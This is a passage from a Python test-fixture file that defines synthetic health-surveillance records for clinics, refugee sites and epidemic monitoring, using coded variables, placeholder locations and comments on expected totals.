Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9323', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_20": 1, "visit_age_13": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_3": 1, "visit_smo_4": 1, "vis_4":1, "vis_0": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9371', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_20": 1, "visit_age_13": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_4": 1, "visit_lab_5": 1, "visit_lab_3":1, "visit_smo_2": 1, "visit_smo_4": 1, "visit_lab_8": 1, "vis_4":1, "vis_0": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_23": 1, "visit_age_8": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_8": 1, "visit_lab_9": 1, "vis_4": 1, "vis_0": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_9": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_com_2": 1, "visit_lab_7": 1, "visit_lab_6":1, "visit_lab_10":1, "visit_lab_11": 1, "vis_4":1, "vis_0": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# Hypertension
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9324', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_204": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_1": 1, "vis_4":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_14": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_1": 1, "visit_lab_2": 1,"visit_smo_4": 1, "visit_smo_2": 1, "visit_lab_10": 1, "visit_lab_11": 1, "vis_4":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_23": 1, "visit_age_8": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_3": 1, "visit_lab_4": 1, "vis_4":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_9": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_com_1": 1, "vis_4":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# Return visits
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9323', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_20": 1, "visit_age_13": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_3": 1, "visit_smo_4": 1, "vis_5":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9371', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_20": 1, "visit_age_13": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_4": 1, "visit_lab_5": 1, "visit_lab_3":1, "visit_smo_2": 1, "visit_smo_4": 1, "visit_lab_8": 1, "vis_5":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_23": 1, "visit_age_8": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_8": 1, "visit_lab_9": 1, "vis_5":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_9": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_com_2": 1, "visit_lab_7": 1, "visit_lab_6":1, "visit_lab_10":1, "visit_lab_11": 1, "vis_5":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# Hypertension
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9324', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_14": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_1": 1, "vis_5":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_14": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_1": 1, "visit_lab_2": 1,"visit_smo_4": 1, "visit_smo_2": 1, "visit_lab_10": 1, "visit_lab_11": 1, "vis_5":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_23": 1, "visit_age_8": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_3": 1, "visit_lab_4": 1, "vis_5":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_9": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_com_1": 1, "vis_5":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)})
]
pip_report = [
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9321', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_1": 1, "age_7": 1,"nat_1": 1, "sta_1": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1,"nat_1": 1, "sta_1": 1, "age_13": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_3": 1,"nat_1": 1, "sta_1": 1, "age_9": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9374', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1,"nat_1": 1, "sta_1": 1, "age_10": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9325', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_2": 1,"nat_1": 1, "sta_1": 1, "age_14": 1, "pip_1": 1, "pip_2": 1, "pip_3": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 6, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_2": 1, "nat_1": 1, "sta_1": 1,"age_14": 1, "pip_1": 1, "pip_2": 1, "pip_3": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 6, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_3": 1, "nat_1": 1, "sta_1": 1,"age_9": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 10, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 7, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1,"nat_2": 1, "sta_2": 1, "age_10": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 10, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 7, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9379', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1,"nat_2": 1, "sta_2": 1, "age_9": 1, "pip_1": 1, "pip_3": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2016, 4, 30, 23, 54, 16, 49059)})
]
refugee_data = [
# Population and other cumulative numbers should be taken from second entry
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Refugee', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, 'ref_1': 1, 'ref_2': 1, 'ref_3': 1, 'ref_4': 1, 'ref_5': 1, 'ref_6': 1, 'ref_7': 1, 'ref_8': 1, 'ref_9': 1, 'ref_10': 1, 'ref_11': 1, 'ref_12': 1, 'ref_14': 1, 'ref_13': 50,'ref_15': 1, 'ref_16': 2, 'ref_19': 1, 'ref_20': 1, 'ref_60': 1, 'ref_61': 2, 'ref_95': 1, 'ref_96': 1, 'ref_331': 1, 'ref_332': 1, 'ref_460': 1, 'ref_462': 2, 'ref_557': 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:fe301f1b-c541-4dde-a355-1552b03e6b7f', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 4, 13, 0, 0), 'clinic_type': 'Refugee', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, 'ref_1': 2, 'ref_2': 3, 'ref_3': 4, 'ref_4': 5, 'ref_5': 6, 'ref_6': 7, 'ref_7': 8, 'ref_9': 9, 'ref_10': 10, 'ref_11': 11, 'ref_12': 12, 'ref_14': 5, 'ref_13': 100,'ref_15': 1, 'ref_16': 2, 'ref_19': 1, 'ref_20': 1, 'ref_60': 1, 'ref_61': 2, 'ref_95': 1, 'ref_96': 1, 'ref_331': 1, 'ref_332': 1, 'ref_460': 1, 'ref_462': 2, 'ref_557': 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:1d337c48-853c-4fc2-93b9-2e5aa74d72b3', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 4, 29, 0, 0), 'clinic_type': 'Refugee', 'district': 5, 'region': 2, 'clinic': 7, 'variables': {"data_entry":1, 'ref_1': 1, 'ref_2': 1, 'ref_3': 1, 'ref_4': 1, 'ref_5': 1, 'ref_6': 1, 'ref_7': 1, 'ref_8': 1, 'ref_9': 1, 'ref_10': 1, 'ref_11': 1, 'ref_12': 1, 'ref_14': 1, 'ref_13': 20, 'ref_15': 1, 'ref_16': 2, 'ref_19': 1, 'ref_20': 1, 'ref_60': 1, 'ref_61': 1, 'ref_95': 1, 'ref_96': 1, 'ref_331': 1, 'ref_332': 1, 'ref_460': 1, 'ref_462': 3, 'ref_557': 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:c35445a9-eabc-4609-bcb7-4a333c0e23f1', 'country': 1}),
Data(**{'date': datetime.datetime(2016, 4, 29, 0, 0), 'clinic_type': 'Refugee', 'district': 5, 'region': 2, 'clinic': 7, 'variables': {"data_entry":1, 'ref_1': 1, 'ref_2': 1, 'ref_3': 1, 'ref_4': 1, 'ref_5': 1, 'ref_6': 1, 'ref_7': 1, 'ref_8': 1, 'ref_9': 1, 'ref_10': 1, 'ref_11': 1, 'ref_12': 1, 'ref_14': 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:c35445a9-eabc-4609-bcb7-4a333c0e23f2', 'country': 1})
]
year = datetime.datetime.now().year
frontpage = [
# Registers, total cases = 15
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a5', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1, 'reg_2': 15 }, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 11, 32, 51, 80545), 'epi_week': 18}),
# Cases, total cases = 10, 3 Males, 7 females, 2 per age category, 7 Demo Nationality 3 Null
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9323', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059), 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9324', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert_reason": "cmd_5", "alert": 1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059), 'epi_week': 18})
]
map_test = [
# Cases, total cases = 10, 3 Males, 7 females, 2 per age category, 7 Demo Nationality 3 Null
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9321', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "mod_1":1, "mod_2": 1, "mod_3": 1, "mod_4": 1, "mod_5": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_2": 1, "age_8": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9374', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_2": 1, "age_8": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_3": 1, "age_9": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_3": 1, "age_15": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "smo_2": 1, "smo_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1 , "age_10": 1, "nat_2": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'clinic_type': 'Hospital', 'district': 5, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1 , "age_10": 1, "nat_2": 1, "sta_1": 1, "prc_2": 1, "ncd_2": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(year, 5, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9379', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_5": 1, "age_11": 1, "nat_2": 1, "sta_1": 1, "prc_2": 1 , "ncd_1": 1, "icb_47": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9380', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_5": 1, "age_11": 1, "nat_1": 1, "sta_2": 1, "prc_3": 1, "icb_54": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
]
epi_monitoring = [
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, 'alert': 1, 'alert_reason':'cmd_1', 'ale_1':'1' ,'cmd_43': 1,'cmd_48': 1, 'epi_1': 1, 'epi_2': 1, 'epi_3': 1, 'epi_4': 1, 'epi_5': 1, 'epi_6': 1, 'epi_7': 1,'icd_1': 1, 'icd_113': 1, 'icd_168': 1, 'icd_17': 1, 'icd_188': 1, 'icd_2189': 1, 'icd_2194': 1, 'icd_321': 1, 'icd_35': 1, 'icd_380': 1, 'icd_391': 1, 'icd_4177': 1, 'icd_4183': 1, 'icd_421': 1, 'icd_461': 1, 'icd_488': 1, 'icd_530': 1, 'icd_68': 1, 'icd_804': 1, 'icd_91': 1, 'icd_9225': 1, 'icd_9643': 1, 'reg_4': 1, 'mat_0': 1, 'mat_1': 1, 'mat_2': 1, 'mat_3': 1, 'mat_4': 1, 'mat_5': 1, 'mat_6': 1, 'mat_7': 1, 'mat_8': 1, 'mat_9': 1, 'dea_0': 1, 'dea_1': 1, 'dea_2': 1, 'dea_3': 1, 'dea_4': 1, 'dea_5': 1, 'dea_6': 1, 'dea_7': 1, 'dea_8': 1, 'dea_9': 1, 'mor_1':1, 'mor_2':1, 'mor_3':1, 'mor_4':1, 'mor_5':1, 'mor_6':1, 'mor_7':1, 'mor_8':1, 'mor_9':1, 'mor_10':1, 'mor_11':1, 'mor_12':1, 'mor_13':1, 'mor_14':1, 'mor_15':1, 'mor_16':1, 'mor_17':1, 'mor_18':1, 'mor_19':1, 'mor_20':1, 'mor_21':1, 'mor_22':1, 'mor_23':1, 'mor_24':1, 'mor_25':1, 'mor_26':1, 'mor_27':1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:fe301f1b-c541-4dde-a355-1552b03e6b7f', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_1":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:1', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_4":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:2', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_5":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:3', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_6":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:4', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_7":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:5', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_8":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:6', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_9":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:7', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_10":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:8', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_11":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:9', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_12":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:10', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_13":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:11', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_15":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:12', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_16":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:13', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_18":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:14', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_19":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:15', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_20":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:16', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_23":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:17', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_24":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:18', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_25":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:19', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_26":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:20', 'country': 1}),
